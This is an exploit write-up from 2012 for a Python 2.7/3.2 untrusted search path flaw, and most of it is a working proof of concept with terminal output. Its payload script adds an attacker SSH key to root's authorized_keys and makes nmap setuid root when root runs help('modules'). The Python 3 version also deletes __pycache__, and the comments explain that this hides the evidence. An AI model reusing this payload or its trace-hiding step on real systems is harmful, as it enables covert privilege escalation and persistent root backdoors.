Python – Untrusted Search Path/Code Execution

  • 作者: rogueclown
    日期: 2012-07-09
  • 类别:
  • 来源:
  • # Exploit Title: Python untrusted search path/code execution vulnerability
    # Date: 7.6.12
    # Exploit Author: rogueclown
    # Vendor Homepage:
    # Software Link:
    # Version: python 2.7.2 and python 3.2.1
    # Tested on: linux (my test machine was OpenSUSE 12.1)
    # This is an expansion on -- a big thanks,
    # and the lion's share of the credit, to ShadowHatesYou (
    # They found the vulnerability; i just found a more generalized application
    # of it.
    # Basically, i found that it's not just python-wrapper that executes a
    # script within the current working directory when help('modules') is run --
    # python itself does that.In python 2, it works just as ShadowHatesYou showed
    # it in his python-wrapper exploit.
    # This still works in python 3, but you have to do a bit more to cover your
    # tracks.In the working directory, python 3 drops a __pycache__ directory 
    # with a .pyc file inside it.Most of the bytecode in there is not human
    # readable, but it displays the shell command called by the script in 
    # plaintext, making it pretty obvious that something funny happened.However,
    # you can get around this by making sure that your script removes the
    # __pycache__ directory from the working directory. 
    # rogueclown
    # 7.6.12
    # PYTHON 2 #
    adalia@bukkit:~/security/pythonwrapper> ls -hl
    -rw-r--r-- 1 adalia users 144 Jul4 15:47
    adalia@bukkit:~/security/pythonwrapper> cat
    import os
    os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap")
    adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
    -rwxr-xr-x 1 root root 1.4M Oct 292011 /usr/bin/nmap
    adalia@bukkit:~/security/pythonwrapper> su
    bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
    ls: cannot access /root/.ssh/authorized_keys: No such file or directory
    bukkit:/home/adalia/security/pythonwrapper # python
    Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> help('modules')
    Please wait a moment while I gather a list of all available modules...
    /usr/lib64/python2.7/site-packages/gobject/ Warning: g_boxed_type_register_static: assertion `g_type_from_name (name) == 0' failed
    import gobject._gobject
    /usr/lib64/python2.7/site-packages/twisted/words/im/ UserWarning: will be undergoing a rewrite at some point in the future.
    warnings.warn(" will be undergoing a rewrite at some point in the future.")
    ** Message: pygobject_register_sinkfunc is deprecated (GstObject)
    Alacarteabc gtkunixprintreadline
    Bastion antigravity hashlib resource
    BeautifulSoup anydbmheapq rexec
    CDROM array hotshot rlcompleter
    CGIHTTPServer ast hpmudextrobotparser
    Cookieasyncorehtmllib runpy
    Cryptoatexithttplib satsolver
    DLFCN atk httplib2scanext
    DocXMLRPCServer atomieee1284sched
    INbase64imaplib select
    MimeWriterbdb imghdrserial
    OpenSSL beakerimp sets
    PAM binasciiimportlib setuptools
    PyQt4 binheximputil sgmllib
    Queue bisectinspect sha
    SimpleHTTPServerbsddb ioshelve
    SimpleXMLRPCServerbutterfly itertools shlex
    SocketServerbz2 jsonshutil
    StringIOcPickle keyword signal
    TYPES cProfilelib2to3 simplejson
    UserDictcStringIO libproxysip
    UserListcairo libvboxjxpcom site
    UserStringcalendarlibxml2 smbc
    VBoxAuthcgi libxml2modsmtpd
    VBoxAuthSimplecgitb linecache smtplib
    VBoxDDchunk linuxaudiodev sndhdr
    VBoxDD2 cmath localesocket
    VBoxDDU cmd logging spwd
    VBoxDbg codelouie sqlite3
    VBoxGuestControlSvc codecsmacpath sre
    VBoxGuestPropSvccodeopmacurl2path sre_compile
    VBoxHeadlesscoherence mad sre_constants
    VBoxKeyboardcollections mailbox sre_parse
    VBoxNetDHCP colorsysmailcap ssl
    VBoxOGLhostcrutil commandsmakostat
    VBoxOGLhosterrorspu compileallmarkupbasestatvfs
    VBoxPythoncontextlibmarshal stringold
    VBoxPython2_7 cookielib mathstringprep
    VBoxREM copymd5 strop
    VBoxRTcopy_regmhlib struct
    VBoxSDL crypt mimetools subprocess
    VBoxSharedClipboard csv mimetypes sunau
    VBoxSharedFolders cupsmmapsymbol
    VBoxVMM cupsext modulefindersymtable
    VBoxXPCOM cupshelpers multifile sys
    VBoxXPCOMCcurlmultiprocessing sysconfig
    VirtualBoxdatetimemutagen syslog
    Xlibdbhashmutex tabnanny
    _LWPCookieJar dbusmygpoclient tarfile
    _MozillaCookieJar dbus_bindings netrc telepathy
    __builtin__ decimal new telnetlib
    __future__difflib nis tempfile
    _abcoll dircachenntplib termios
    _astdis ntpathtextwrap
    _bisect distutils nturl2paththis
    _bsddbdoctest numbers thread
    _codecs drv_libxml2 numpy threading
    _codecs_hkdumbdbm operatortimeit
    _codecs_iso2022 dummy_threadoptparsetoaiff
    _codecs_jpdummy_threading ostoken
    _codecs_twemail ossaudiodev trace
    _collectionsencodings packagekittraceback
    _csverrno pango tty
    _ctypes exceptionspangocairotwisted
    _ctypes_testeyeD3 papyontypes
    _dbus_bindingsfcntl parserunicodedata
    _dbus_glib_bindings feedparserpcardextunittest
    _elementtreefilecmp pdb uno
    _functoolsfileinput pickleunohelper
    _hashlibfnmatch pickletools urlgrabber
    _heapqformatter pipes urllib
    _hotshotfpformatpkg_resources urllib2
    _io fractions pkgutil urlparse
    _json ftplibplatformuser
    _locale functools plistlibuu
    _lsprof future_builtins popen2uuid
    _multibytecodec gdata posix vboxshell
    _multiprocessinggenericpath posixfile volkeys
    _pyio getoptposixpath warnings
    _random getpass pprintwave
    _satsolvergettext profile weakref
    _sha256 gio pty whichdb
    _sha512 glibpwd wsgiref
    _socket globpy_compilexdg
    _sqlite3gmenu pyclbrxdrlib
    _sslgnomekeyringpydoc xmllib
    _strptime gobject pydoc_dataxmlrpclib
    _struct gpodpyexpat xxsubtype
    _symtable gpodder pygst zeitgeist
    _testcapi grp pygtk zipfile
    _threading_localgst pynotifyzipimport
    _warnings gstoption quoprizlib
    _weakrefgtk randomzope
    _weakrefset gtktrayicon re
    Enter any module name to get more help.Or, type "modules spam" to search
    for modules whose descriptions contain the word "spam".
    >>> exit()
    bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
    -rwsr-xr-x 1 root root 1.4M Oct 292011 /usr/bin/nmap
    bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
    ssh-rsa rogueclown washere
    bukkit:/home/adalia/security/pythonwrapper # 
    # PYTHON 3 #
    adalia@bukkit:~/security/pythonwrapper> ls -hl
    -rw-r--r-- 1 adalia users 169 Jul4 15:51
    adalia@bukkit:~/security/pythonwrapper> cat
    import os
    os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap; /bin/rm -rf __pycache__")
    adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
    -rwxr-xr-x 1 root root 1.4M Oct 292011 /usr/bin/nmap
    adalia@bukkit:~/security/pythonwrapper> su
    bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
    ls: cannot access /root/.ssh/authorized_keys: No such file or directory
    bukkit:/home/adalia/security/pythonwrapper # python3
    Python 3.2.1 (default, Jul 18 2011, 16:24:40) [GCC] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> help('modules')
    Please wait a moment while I gather a list of all available modules...
    CDROM binasciiinspect shelve
    DLFCN binhexioshlex
    INbisectitertools shutil
    TYPES builtinsjsonsignal
    __future__bz2 keyword site
    _abcoll cProfilelinecache smtpd
    _bisect cgi logging sndhdr
    _codecs cgitb macpath socket
    _codecs_cnchunk macurl2path socketserver
    _codecs_hkcmath mailbox spwd
    _codecs_iso2022 cmd mailcap sqlite3
    _codecs_jpcodemarshal sre_compile
    _codecs_twcodeopmimetypes sre_parse
    _collectionscollections mmapssl
    _csvcompileallmultiprocessing string
    _ctypes concurrentnetrc stringprep
    _datetime configparsernis struct
    _dummy_thread contextlibnntplib subprocess
    _functoolscopyreg nturl2pathsymbol
    _hashlibcrypt numbers symtable
    _heapqcsv opcodesys
    _io ctypesoperatorsysconfig
    _json datetimeoptparsesyslog
    _locale decimal ostabnanny
    _lsprof difflib os2emxpathtarfile
    _markupbase dis ossaudiodev telnetlib
    _multibytecodec distutils parsertempfile
    _multiprocessingdoctest pdb termios
    _pickle dummy_threading pickletextwrap
    _posixsubprocessemail pickletools this
    _pyio encodings pipes threading
    _random errno pkgutil time
    _socket fcntl platformtimeit
    _sqlite3filecmp plistlibtoken
    _srefileinput poplibtokenize
    _sslfnmatch posix trace
    _string formatter posixpath traceback
    _strptime fractions pprinttty
    _struct ftplibprofile turtle
    _symtable functools pstatstypes
    _thread gcpty unicodedata
    _threading_localgenericpath pwd unittest
    _warnings getoptpy_compileurllib
    _weakrefgetpass pyclbruu
    _weakrefset gettext pydoc uuid
    abc globpydoc_datawarnings
    aifcgrp queue wave
    antigravity gzipquopriweakref
    argparsehashlib randomwebbrowser
    array heapq rewsgiref
    ast hmacreadlinexdrlib
    asynchathtmlreprlib xxlimited
    atexitimaplib rlcompleter zipfile
    audioop imghdrrunpy zipimport
    base64imp sched zlib
    bdb importlib select
    Enter any module name to get more help.Or, type "modules spam" to search
    for modules whose descriptions contain the word "spam".
    >>> exit()
    bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
    -rwsr-xr-x 1 root root 1.4M Oct 292011 /usr/bin/nmap
    bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
    ssh-rsa rogueclown washere
    bukkit:/home/adalia/security/pythonwrapper # ls __pycache__
    ls: cannot access __pycache__: No such file or directory
    bukkit:/home/adalia/security/pythonwrapper #